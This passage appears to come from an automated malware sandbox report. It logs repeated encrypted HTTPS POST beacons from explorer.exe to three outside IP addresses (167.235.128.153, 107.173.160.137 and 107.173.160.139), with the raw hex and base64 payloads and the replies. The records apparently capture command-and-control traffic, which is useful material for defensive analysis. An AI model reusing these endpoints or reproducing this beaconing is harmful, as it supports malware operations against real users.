                                                          2024-07-19 11:45:12 UTC685INData Raw: 4e 72 58 32 41 2f 72 2b 7a 68 54 65 42 77 6d 38 67 37 46 58 5a 53 45 31 78 35 33 6a 4a 6a 6b 43 41 57 4b 51 73 52 51 2b 79 38 50 62 47 79 63 37 5a 63 47 6f 30 4c 30 65 55 69 6c 76 4d 43 31 4b 46 2f 41 73 61 6e 71 59 73 53 6d 4f 34 49 79 51 48 5a 6f 77 31 59 66 67 38 4b 37 54 62 50 67 43 47 70 45 62 75 6c 76 31 4c 58 75 34 62 64 48 79 62 6e 6f 63 32 55 67 56 50 51 78 79 7a 37 64 54 66 7a 43 53 30 78 44 38 71 46 48 4a 69 41 46 6f 45 2f 48 5a 67 52 77 76 61 54 53 4a 71 76 42 4c 4e 4d 44 6f 50 53 6d 74 2b 79 31 48 39 52 52 79 74 49 69 45 45 35 33 79 45 33 39 70 37 49 79 78 4a 43 50 69 69 35 73 67 49 5a 51 7a 56 6a 47 6e 69 45 6b 47 79 33 37 57 73 7a 37 66 65 41 39 4b 63 36 33 4e 73 53 6d 68 4b 70 33 6c 4d 68 56 57 46 34 47 4a 71 61 34 39 6a 74 30 67 64 39 39
                                                          Data Ascii: NrX2A/r+zhTeBwm8g7FXZSE1x53jJjkCAWKQsRQ+y8PbGyc7ZcGo0L0eUilvMC1KF/AsanqYsSmO4IyQHZow1Yfg8K7TbPgCGpEbulv1LXu4bdHybnoc2UgVPQxyz7dTfzCS0xD8qFHJiAFoE/HZgRwvaTSJqvBLNMDoPSmt+y1H9RRytIiEE53yE39p7IyxJCPii5sgIZQzVjGniEkGy37Wsz7feA9Kc63NsSmhKp3lMhVWF4GJqa49jt0gd99


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.557820167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:13 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:13 UTC1122OUTData Raw: 61 76 49 32 36 64 2b 54 55 64 4f 6c 4c 2f 30 46 31 45 54 6c 6d 36 7a 47 64 62 77 67 48 45 65 33 58 2f 58 48 54 4d 70 76 35 4c 77 43 71 62 37 48 6a 66 30 33 4d 4e 2b 6f 47 65 48 4a 67 35 69 76 47 36 4f 34 6c 4c 68 76 4f 63 71 66 6d 47 2b 4f 75 4c 6e 67 67 38 55 2f 77 33 59 46 73 65 78 2f 63 72 71 37 73 71 6e 58 34 76 78 64 69 79 64 63 59 72 51 77 54 62 4a 2f 37 38 47 75 54 31 5a 44 2f 45 66 4d 5a 71 51 7a 49 52 79 6f 75 45 58 53 34 44 7a 41 5a 6b 6b 45 6d 4c 4b 39 41 59 6a 6c 79 57 6c 68 76 4e 42 59 44 32 2b 59 4e 66 53 2b 66 43 47 50 42 6f 5a 6d 74 41 48 39 42 5a 71 6a 56 6d 35 55 50 73 66 33 76 70 66 37 4f 67 4f 70 68 4b 48 69 69 30 78 4b 74 75 48 68 68 4a 70 4d 7a 55 38 78 34 6c 51 76 37 62 74 77 6a 52 55 36 72 7a 62 75 4a 4a 33 33 46 79 50 6b 54 6b 46
                                                          Data Ascii: avI26d+TUdOlL/0F1ETlm6zGdbwgHEe3X/XHTMpv5LwCqb7Hjf03MN+oGeHJg5ivG6O4lLhvOcqfmG+OuLngg8U/w3YFsex/crq7sqnX4vxdiydcYrQwTbJ/78GuT1ZD/EfMZqQzIRyouEXS4DzAZkkEmLK9AYjlyWlhvNBYD2+YNfS+fCGPBoZmtAH9BZqjVm5UPsf3vpf7OgOphKHii0xKtuHhhJpMzU8x4lQv7btwjRU6rzbuJJ33FyPkTkF
                                                          2024-07-19 11:45:14 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:13 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:14 UTC685INData Raw: 56 58 79 55 70 78 57 31 4e 6e 64 77 4f 6c 71 74 59 2b 31 73 2b 75 4f 5a 61 7a 42 58 72 67 6f 53 4a 42 44 70 74 6c 4e 54 39 4d 68 68 55 64 53 79 57 33 61 69 36 67 44 63 36 54 72 59 51 4a 76 38 34 6c 74 65 42 67 51 44 72 6f 6c 6f 6c 67 46 51 48 71 39 56 7a 6d 54 5a 58 65 38 38 52 62 4e 76 64 37 6b 44 61 79 72 7a 71 74 69 70 48 57 66 42 59 58 65 58 34 41 4b 77 57 68 74 71 79 6d 49 56 2f 53 32 44 76 74 62 79 75 39 6f 54 70 68 41 79 2f 6e 4b 4b 68 47 56 4f 7a 59 38 32 4e 53 43 2b 37 4f 6f 76 76 78 4b 52 78 68 73 76 42 68 54 68 74 58 31 2f 70 57 47 42 70 65 52 36 57 2b 4d 6e 48 67 77 45 2f 61 79 74 57 49 4c 54 37 39 73 6a 6f 34 50 6e 56 37 48 32 47 34 79 63 47 74 6b 7a 56 70 34 4b 72 67 79 55 41 58 78 37 51 55 45 61 6a 56 32 58 30 64 71 46 70 75 42 4e 6d 7a 4a
                                                          Data Ascii: VXyUpxW1NndwOlqtY+1s+uOZazBXrgoSJBDptlNT9MhhUdSyW3ai6gDc6TrYQJv84lteBgQDrololgFQHq9VzmTZXe88RbNvd7kDayrzqtipHWfBYXeX4AKwWhtqymIV/S2Dvtbyu9oTphAy/nKKhGVOzY82NSC+7OovvxKRxhsvBhThtX1/pWGBpeR6W+MnHgwE/aytWILT79sjo4PnV7H2G4ycGtkzVp4KrgyUAXx7QUEajV2X0dqFpuBNmzJ


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.557821107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:14 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:14 UTC1122OUTData Raw: 6c 7a 79 46 4c 49 57 53 4e 34 69 58 36 5a 55 79 35 49 5a 45 41 76 62 6b 65 6f 39 73 2b 63 51 50 57 6c 6b 30 2f 55 47 35 30 71 35 54 4e 46 73 75 6d 43 32 54 57 56 63 78 52 66 63 39 79 7a 53 2f 2b 38 47 7a 47 6f 72 33 2b 31 4a 56 31 2f 5a 55 47 48 47 45 77 46 66 55 46 66 33 4f 75 73 46 2b 38 5a 70 4b 63 6d 79 4e 4c 51 44 59 37 38 4e 54 59 78 52 43 44 44 31 52 34 43 34 50 71 59 75 6d 6a 73 44 54 31 56 77 44 2f 31 34 50 70 77 38 68 74 4a 69 2b 71 4e 37 6e 61 33 35 48 7a 35 69 45 33 44 32 45 39 77 69 71 48 7a 59 50 41 45 63 43 4c 4a 5a 43 57 43 75 49 5a 68 37 73 52 35 50 37 32 6e 68 34 59 75 4e 6c 77 69 69 35 44 50 4c 37 45 45 57 46 47 62 70 73 58 69 69 69 39 51 66 31 57 4b 63 70 5a 51 30 47 6b 6e 31 6b 4b 54 30 75 76 46 59 2b 56 68 56 44 71 6a 67 5a 53 67 61
                                                          Data Ascii: lzyFLIWSN4iX6ZUy5IZEAvbkeo9s+cQPWlk0/UG50q5TNFsumC2TWVcxRfc9yzS/+8GzGor3+1JV1/ZUGHGEwFfUFf3OusF+8ZpKcmyNLQDY78NTYxRCDD1R4C4PqYumjsDT1VwD/14Ppw8htJi+qN7na35Hz5iE3D2E9wiqHzYPAEcCLJZCWCuIZh7sR5P72nh4YuNlwii5DPL7EEWFGbpsXiii9Qf1WKcpZQ0Gkn1kKT0uvFY+VhVDqjgZSga
                                                          2024-07-19 11:45:16 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:16 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:16 UTC685INData Raw: 66 71 33 4f 35 6d 38 72 6c 36 4f 46 47 62 30 61 73 37 70 78 34 6a 4a 39 6a 69 59 6d 46 7a 41 74 4d 73 2b 54 56 4d 73 34 74 48 6d 6c 72 75 69 55 6b 6b 44 7a 62 4f 50 64 68 73 75 72 6c 73 68 42 4b 74 69 38 42 6c 30 43 4d 34 47 31 4d 44 76 72 35 4c 6e 54 38 6e 33 78 73 5a 38 66 31 79 4c 39 6d 6d 74 78 53 4e 67 78 59 54 79 46 42 53 6e 38 2f 62 70 2f 59 53 67 79 56 50 33 76 2f 6d 49 2b 6a 37 32 43 6a 4e 55 46 42 71 67 68 4c 4d 51 4c 32 49 73 51 39 56 39 53 58 4a 37 78 6d 74 74 79 6b 53 50 75 61 62 42 30 46 42 74 4a 76 79 4f 66 61 51 63 2f 53 55 34 6d 39 58 76 51 4a 78 6c 30 33 59 57 65 67 68 43 41 69 33 77 56 2f 4e 50 6c 2f 43 49 53 32 6c 2f 4b 50 34 42 35 78 79 30 74 5a 30 68 42 6a 4e 48 46 4d 54 42 4b 2b 75 71 48 70 62 79 4c 33 35 47 67 70 62 34 39 4b 34 32
                                                          Data Ascii: fq3O5m8rl6OFGb0as7px4jJ9jiYmFzAtMs+TVMs4tHmlruiUkkDzbOPdhsurlshBKti8Bl0CM4G1MDvr5LnT8n3xsZ8f1yL9mmtxSNgxYTyFBSn8/bp/YSgyVP3v/mI+j72CjNUFBqghLMQL2IsQ9V9SXJ7xmttykSPuabB0FBtJvyOfaQc/SU4m9XvQJxl03YWeghCAi3wV/NPl/CIS2l/KP4B5xy0tZ0hBjNHFMTBK+uqHpbyL35Ggpb49K42


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.557822107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:16 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:16 UTC1122OUTData Raw: 71 38 70 64 65 7a 77 5a 30 44 6d 48 48 63 33 4e 57 63 2f 30 4f 68 32 67 76 5a 6f 56 67 63 45 37 58 44 69 30 73 41 62 4e 44 73 69 36 44 35 79 36 56 61 43 72 70 44 70 6d 54 6c 6b 67 48 67 45 53 2b 31 4a 39 53 59 46 59 53 56 6a 4a 43 45 74 37 6a 45 30 6d 62 4f 68 6e 55 45 2b 4f 4a 46 61 65 58 45 37 56 33 68 4e 4a 64 73 33 37 36 71 55 41 6f 47 6f 46 46 5a 49 6d 78 49 50 34 43 53 46 69 56 50 32 66 71 6a 50 4e 53 5a 37 61 68 79 58 6e 77 4e 74 55 69 72 37 55 45 44 76 39 5a 32 39 50 74 4d 72 72 6c 69 56 45 56 70 42 46 7a 59 34 46 4b 6b 79 58 50 70 73 61 5a 4d 36 66 38 36 59 4e 50 56 75 2f 37 48 45 73 4a 7a 4e 66 31 33 56 57 32 43 67 43 6a 37 6e 76 4f 54 6b 6d 47 67 47 58 57 36 59 4b 54 37 35 7a 6d 50 52 4c 2b 31 78 6e 77 7a 6e 54 4e 63 51 52 61 63 46 75 4b 42 72
                                                          Data Ascii: q8pdezwZ0DmHHc3NWc/0Oh2gvZoVgcE7XDi0sAbNDsi6D5y6VaCrpDpmTlkgHgES+1J9SYFYSVjJCEt7jE0mbOhnUE+OJFaeXE7V3hNJds376qUAoGoFFZImxIP4CSFiVP2fqjPNSZ7ahyXnwNtUir7UEDv9Z29PtMrrliVEVpBFzY4FKkyXPpsaZM6f86YNPVu/7HEsJzNf13VW2CgCj7nvOTkmGgGXW6YKT75zmPRL+1xnwznTNcQRacFuKBr
                                                          2024-07-19 11:45:18 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:18 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:18 UTC685INData Raw: 62 53 6d 32 6e 6c 55 59 55 45 36 4a 34 4d 5a 6b 4c 38 45 74 41 37 2f 72 6e 4c 32 59 51 6f 6c 6e 4b 54 44 79 4a 51 39 76 5a 6d 4d 6d 45 45 33 30 4f 2f 69 38 38 42 69 76 73 50 56 7a 4a 63 69 4e 48 47 4c 53 6f 73 59 58 52 70 43 54 62 7a 79 4a 69 34 72 51 77 70 78 75 42 34 6a 30 78 53 77 77 64 47 6c 36 41 57 63 67 70 56 78 70 43 31 79 54 39 36 67 46 70 59 30 52 42 38 41 4b 64 37 79 67 79 47 4a 4a 4e 58 51 43 43 35 39 78 78 42 76 57 6a 50 72 55 55 6b 68 55 6e 30 39 45 47 7a 38 30 78 61 68 33 54 6a 2b 7a 46 39 45 32 53 54 2b 75 44 72 6c 4c 77 36 47 39 66 44 7a 48 51 64 4a 69 59 34 71 79 70 56 72 4e 59 71 34 65 34 2b 63 4d 37 73 48 50 41 79 4e 58 36 46 31 47 66 4e 70 6d 58 7a 67 7a 48 51 64 6c 2f 74 39 36 39 63 74 37 58 45 61 2b 71 52 36 61 59 4a 53 58 33 36 71
                                                          Data Ascii: bSm2nlUYUE6J4MZkL8EtA7/rnL2YQolnKTDyJQ9vZmMmEE30O/i88BivsPVzJciNHGLSosYXRpCTbzyJi4rQwpxuB4j0xSwwdGl6AWcgpVxpC1yT96gFpY0RB8AKd7ygyGJJNXQCC59xxBvWjPrUUkhUn09EGz80xah3Tj+zF9E2ST+uDrlLw6G9fDzHQdJiY4qypVrNYq4e4+cM7sHPAyNX6F1GfNpmXzgzHQdl/t969ct7XEa+qR6aYJSX36q


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.557823167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:19 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:45:19 UTC1267OUTData Raw: 55 64 44 4e 38 31 77 32 47 69 62 61 6a 47 71 6a 72 4d 31 72 65 30 77 6d 63 34 4b 64 6c 65 31 52 74 79 72 4a 75 78 4a 71 59 45 66 62 7a 56 76 53 43 6a 64 72 76 2f 52 5a 4d 65 31 56 38 43 73 45 67 4b 67 45 42 36 69 38 7a 2f 50 4b 33 38 2f 34 59 77 55 2b 4d 70 6f 32 56 76 53 4d 61 2b 6e 48 58 57 57 4d 55 30 68 63 31 33 62 73 2b 53 36 37 39 41 61 46 74 62 69 35 37 58 32 43 6f 6f 30 52 53 35 6d 32 36 67 41 66 6e 43 44 70 44 76 35 6d 53 63 79 65 4a 38 65 54 34 63 62 32 74 53 65 38 49 4a 36 66 6c 48 68 37 56 55 5a 34 5a 46 78 4c 4d 58 32 73 44 54 72 79 47 36 37 43 57 42 54 67 58 4d 4e 5a 6b 62 48 4f 55 48 47 52 49 74 65 51 53 57 35 32 58 66 6c 64 70 42 50 50 57 48 69 59 70 4c 66 50 74 79 37 4f 39 53 4c 6c 6d 6a 2f 33 6e 6d 64 41 44 55 53 75 4e 71 6f 70 5a 4d 72
                                                          Data Ascii: UdDN81w2GibajGqjrM1re0wmc4Kdle1RtyrJuxJqYEfbzVvSCjdrv/RZMe1V8CsEgKgEB6i8z/PK38/4YwU+Mpo2VvSMa+nHXWWMU0hc13bs+S679AaFtbi57X2Coo0RS5m26gAfnCDpDv5mScyeJ8eT4cb2tSe8IJ6flHh7VUZ4ZFxLMX2sDTryG67CWBTgXMNZkbHOUHGRIteQSW52XfldpBPPWHiYpLfPty7O9SLlmj/3nmdADUSuNqopZMr
                                                          2024-07-19 11:45:20 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:19 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:20 UTC685INData Raw: 34 6a 73 6e 36 67 56 38 38 53 5a 35 62 66 57 51 5a 46 39 66 55 53 6c 66 79 69 73 36 63 45 47 38 63 35 53 57 48 38 39 38 75 43 42 52 68 4f 4b 64 48 66 2f 7a 54 42 6a 78 33 59 4e 49 79 72 66 63 58 4b 4d 57 4b 72 30 43 41 34 39 6c 66 6a 75 4b 62 4a 35 4f 68 33 36 36 57 56 62 49 35 67 42 69 52 4d 4b 6f 6e 39 45 6f 30 78 66 43 33 67 69 32 31 34 56 43 57 58 52 73 49 33 78 6e 39 68 38 57 41 77 64 37 32 66 48 75 73 4d 4c 44 69 30 77 69 4b 56 70 36 67 4e 72 6f 36 49 71 63 30 63 38 30 30 6a 57 7a 39 69 4f 6b 56 51 2f 48 4f 54 4f 54 51 74 2b 78 67 4f 2f 76 4d 49 31 6f 66 57 6a 59 2f 62 4f 62 48 4d 56 41 38 36 37 38 32 44 2b 49 52 72 44 5a 55 6f 39 74 41 4c 56 38 58 62 68 71 6a 63 77 52 74 31 54 73 6a 43 73 62 74 50 32 63 6c 37 39 43 45 58 53 62 52 75 2b 6f 42 50 4a
                                                          Data Ascii: 4jsn6gV88SZ5bfWQZF9fUSlfyis6cEG8c5SWH898uCBRhOKdHf/zTBjx3YNIyrfcXKMWKr0CA49lfjuKbJ5Oh366WVbI5gBiRMKon9Eo0xfC3gi214VCWXRsI3xn9h8WAwd72fHusMLDi0wiKVp6gNro6Iqc0c800jWz9iOkVQ/HOTOTQt+xgO/vMI1ofWjY/bObHMVA86782D+IRrDZUo9tALV8XbhqjcwRt1TsjCsbtP2cl79CEXSbRu+oBPJ


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.557825107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:20 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:20 UTC1122OUTData Raw: 49 59 31 37 4d 61 55 57 34 54 69 2f 49 35 31 30 63 5a 7a 33 57 63 70 42 77 42 58 4a 57 6d 32 68 30 34 68 44 4e 44 57 4c 71 77 4a 66 44 6c 71 6a 32 36 45 43 30 6f 6a 67 6f 76 75 70 57 36 72 4e 31 4b 2b 35 45 44 6f 36 43 33 34 63 38 50 37 73 59 52 38 74 4e 55 6a 78 33 37 6e 39 6e 6f 45 58 63 4b 52 70 56 6c 5a 54 4a 34 4d 39 55 66 2f 4a 62 31 78 49 56 6a 52 71 45 2b 48 68 56 70 43 45 62 52 4a 55 51 46 45 6b 77 67 6b 4e 37 49 61 61 58 36 47 31 75 52 46 63 6d 52 4f 4b 71 5a 61 77 75 74 7a 74 46 4a 41 6f 41 49 74 78 2b 41 5a 4c 57 76 59 57 73 33 58 66 44 65 7a 34 65 4a 70 67 67 52 6c 4e 64 7a 56 4e 34 2f 35 36 74 45 31 61 75 30 5a 37 46 4a 4b 7a 69 72 37 32 53 57 6b 79 44 4a 76 47 37 54 37 77 58 4f 70 79 62 2b 7a 4f 66 50 61 63 6e 6f 75 31 30 39 2f 33 4f 39 6f
                                                          Data Ascii: IY17MaUW4Ti/I510cZz3WcpBwBXJWm2h04hDNDWLqwJfDlqj26EC0ojgovupW6rN1K+5EDo6C34c8P7sYR8tNUjx37n9noEXcKRpVlZTJ4M9Uf/Jb1xIVjRqE+HhVpCEbRJUQFEkwgkN7IaaX6G1uRFcmROKqZawutztFJAoAItx+AZLWvYWs3XfDez4eJpggRlNdzVN4/56tE1au0Z7FJKzir72SWkyDJvG7T7wXOpyb+zOfPacnou109/3O9o
                                                          2024-07-19 11:45:22 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:21 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:22 UTC685INData Raw: 4d 65 71 46 74 39 35 71 30 6d 7a 45 5a 32 67 77 41 49 43 69 4b 6f 44 47 67 2b 44 30 66 6c 78 4c 50 4f 4c 70 4d 4c 2f 4b 78 76 4d 2f 48 44 31 30 62 6f 55 7a 61 32 76 7a 48 54 6d 77 77 72 4a 69 49 53 34 4f 2f 76 4e 50 4d 68 42 79 52 66 71 75 76 76 66 73 65 54 6c 2f 6e 4f 4d 72 4a 33 4d 36 4e 35 65 32 33 65 70 45 46 66 33 48 73 70 78 59 35 77 35 68 50 6d 53 5a 46 32 4d 36 32 30 50 49 54 49 67 52 72 6f 46 75 59 50 6d 47 78 76 43 48 78 61 4b 31 35 61 68 66 43 4e 4a 35 31 35 6a 4f 6e 63 49 37 77 74 4f 72 61 6b 6f 78 56 32 33 39 54 7a 2f 45 50 50 73 4c 42 34 62 30 51 33 57 69 6a 64 76 31 52 34 59 4d 43 55 6a 79 64 55 6a 39 67 6a 78 6d 41 47 6e 4b 79 4e 2b 78 4d 43 5a 34 57 4a 6b 70 34 2f 50 4c 44 51 67 6f 34 62 66 58 54 67 33 75 35 44 72 63 4d 63 78 41 77 36 49
                                                          Data Ascii: MeqFt95q0mzEZ2gwAICiKoDGg+D0flxLPOLpML/KxvM/HD10boUza2vzHTmwwrJiIS4O/vNPMhByRfquvvfseTl/nOMrJ3M6N5e23epEFf3HspxY5w5hPmSZF2M620PITIgRroFuYPmGxvCHxaK15ahfCNJ515jOncI7wtOrakoxV239Tz/EPPsLB4b0Q3Wijdv1R4YMCUjydUj9gjxmAGnKyN+xMCZ4WJkp4/PLDQgo4bfXTg3u5DrcMcxAw6I


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.557826107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:23 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:23 UTC1122OUTData Raw: 53 4e 49 6d 48 62 6d 61 71 52 7a 5a 35 68 62 51 41 33 62 79 31 30 4b 38 56 75 68 6d 75 41 6e 4b 63 53 48 37 6b 51 36 75 61 34 7a 39 2b 59 6d 66 41 68 67 59 4d 69 51 7a 4c 50 4f 63 69 6d 49 50 56 5a 44 75 44 5a 6a 46 4f 37 32 33 54 63 34 59 76 56 43 63 63 52 4e 54 4f 57 79 63 54 6d 4f 78 4c 39 34 58 48 65 51 49 77 4c 48 7a 2f 78 59 45 79 59 72 66 74 4a 6f 37 49 48 73 38 78 30 49 55 4e 65 33 32 38 66 5a 33 78 48 44 79 7a 75 79 59 5a 4f 68 38 43 42 6c 77 71 53 4c 6c 70 78 65 37 77 44 67 55 45 49 4e 57 38 74 5a 71 66 52 6a 61 72 2f 31 38 53 69 2b 74 56 6a 63 76 65 65 4d 59 38 45 52 43 4f 36 70 45 4f 4a 54 6a 6a 77 4c 7a 64 5a 63 43 4f 43 7a 4a 77 68 53 4b 75 76 31 76 71 6a 43 77 57 43 56 38 66 71 57 73 71 6b 46 75 4a 7a 53 37 71 6c 42 76 45 59 44 59 58 6e 33
                                                          Data Ascii: SNImHbmaqRzZ5hbQA3by10K8VuhmuAnKcSH7kQ6ua4z9+YmfAhgYMiQzLPOcimIPVZDuDZjFO723Tc4YvVCccRNTOWycTmOxL94XHeQIwLHz/xYEyYrftJo7IHs8x0IUNe328fZ3xHDyzuyYZOh8CBlwqSLlpxe7wDgUEINW8tZqfRjar/18Si+tVjcveeMY8ERCO6pEOJTjjwLzdZcCOCzJwhSKuv1vqjCwWCV8fqWsqkFuJzS7qlBvEYDYXn3
                                                          2024-07-19 11:45:25 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:25 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:25 UTC685INData Raw: 76 37 77 35 2b 5a 66 2b 43 74 52 57 33 6e 31 6b 2f 38 4e 33 47 2b 39 38 77 56 62 4f 74 45 6a 52 7a 43 33 6f 69 36 74 67 56 70 79 52 69 67 50 6a 7a 37 6d 79 42 52 64 6b 68 62 2f 61 35 45 52 61 6b 58 4b 41 34 2b 6a 35 35 63 34 55 4f 4a 33 36 4f 61 6d 63 63 4a 6d 66 4b 4c 59 58 52 36 2f 79 70 32 33 6b 44 66 73 76 70 71 6e 53 72 69 47 37 63 43 50 2f 65 49 34 49 4e 4f 67 46 6b 56 43 2b 74 56 79 4b 68 73 75 6a 30 47 76 57 6d 68 58 4b 2b 41 57 57 4d 78 4d 54 4a 71 48 45 45 48 43 66 6d 77 67 6a 32 4a 66 6e 48 7a 50 49 48 36 54 74 41 34 48 78 61 44 33 77 75 4a 72 63 6e 71 74 46 41 50 30 5a 32 34 32 4a 54 36 32 79 6e 4f 54 5a 41 6c 42 71 34 6e 58 61 6a 41 45 46 5a 63 7a 4d 31 6a 56 70 35 46 33 71 38 57 56 76 49 64 56 50 6b 4c 2b 76 63 56 64 6b 54 51 46 38 67 61 56
                                                          Data Ascii: v7w5+Zf+CtRW3n1k/8N3G+98wVbOtEjRzC3oi6tgVpyRigPjz7myBRdkhb/a5ERakXKA4+j55c4UOJ36OamccJmfKLYXR6/yp23kDfsvpqnSriG7cCP/eI4INOgFkVC+tVyKhsuj0GvWmhXK+AWWMxMTJqHEEHCfmwgj2JfnHzPIH6TtA4HxaD3wuJrcnqtFAP0Z242JT62ynOTZAlBq4nXajAEFZczM1jVp5F3q8WVvIdVPkL+vcVdkTQF8gaV


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          33192.168.2.557828167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:25 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:25 UTC1122OUTData Raw: 68 70 75 43 43 31 4b 42 76 38 79 6e 72 72 2b 2b 6e 7a 57 79 6c 70 54 31 73 41 61 4e 74 41 32 4e 32 41 71 65 52 6b 6e 49 66 4d 64 49 65 61 52 47 2b 76 77 47 4d 4a 4a 6a 45 65 52 43 64 53 44 36 33 52 6e 54 71 71 2f 76 2b 36 74 51 4e 49 70 73 62 75 45 6d 70 32 53 77 31 78 69 2b 44 75 47 46 39 2f 52 33 36 31 69 61 51 6c 30 2b 36 6c 58 79 68 66 45 4f 33 76 6e 6e 71 6c 6c 65 6a 62 71 73 69 30 33 46 64 2f 6c 54 63 6f 5a 2b 74 44 54 53 66 58 61 33 67 63 5a 38 2b 4c 34 36 71 48 75 2f 6c 4b 7a 65 70 5a 2f 44 2f 39 64 43 33 4a 42 67 6b 67 4f 79 30 57 4a 49 4a 6d 66 36 63 45 7a 71 59 4d 33 47 35 4f 74 6c 39 4a 74 69 44 4d 6b 65 65 61 33 6e 6c 66 58 31 49 34 38 46 76 74 62 6e 47 54 44 62 4d 51 31 68 43 31 74 66 4f 65 52 54 33 73 70 45 7a 76 33 41 4a 2b 6f 5a 56 76 57
                                                          Data Ascii: hpuCC1KBv8ynrr++nzWylpT1sAaNtA2N2AqeRknIfMdIeaRG+vwGMJJjEeRCdSD63RnTqq/v+6tQNIpsbuEmp2Sw1xi+DuGF9/R361iaQl0+6lXyhfEO3vnnqllejbqsi03Fd/lTcoZ+tDTSfXa3gcZ8+L46qHu/lKzepZ/D/9dC3JBgkgOy0WJIJmf6cEzqYM3G5Otl9JtiDMkeea3nlfX1I48FvtbnGTDbMQ1hC1tfOeRT3spEzv3AJ+oZVvW
                                                          2024-07-19 11:45:26 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:26 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
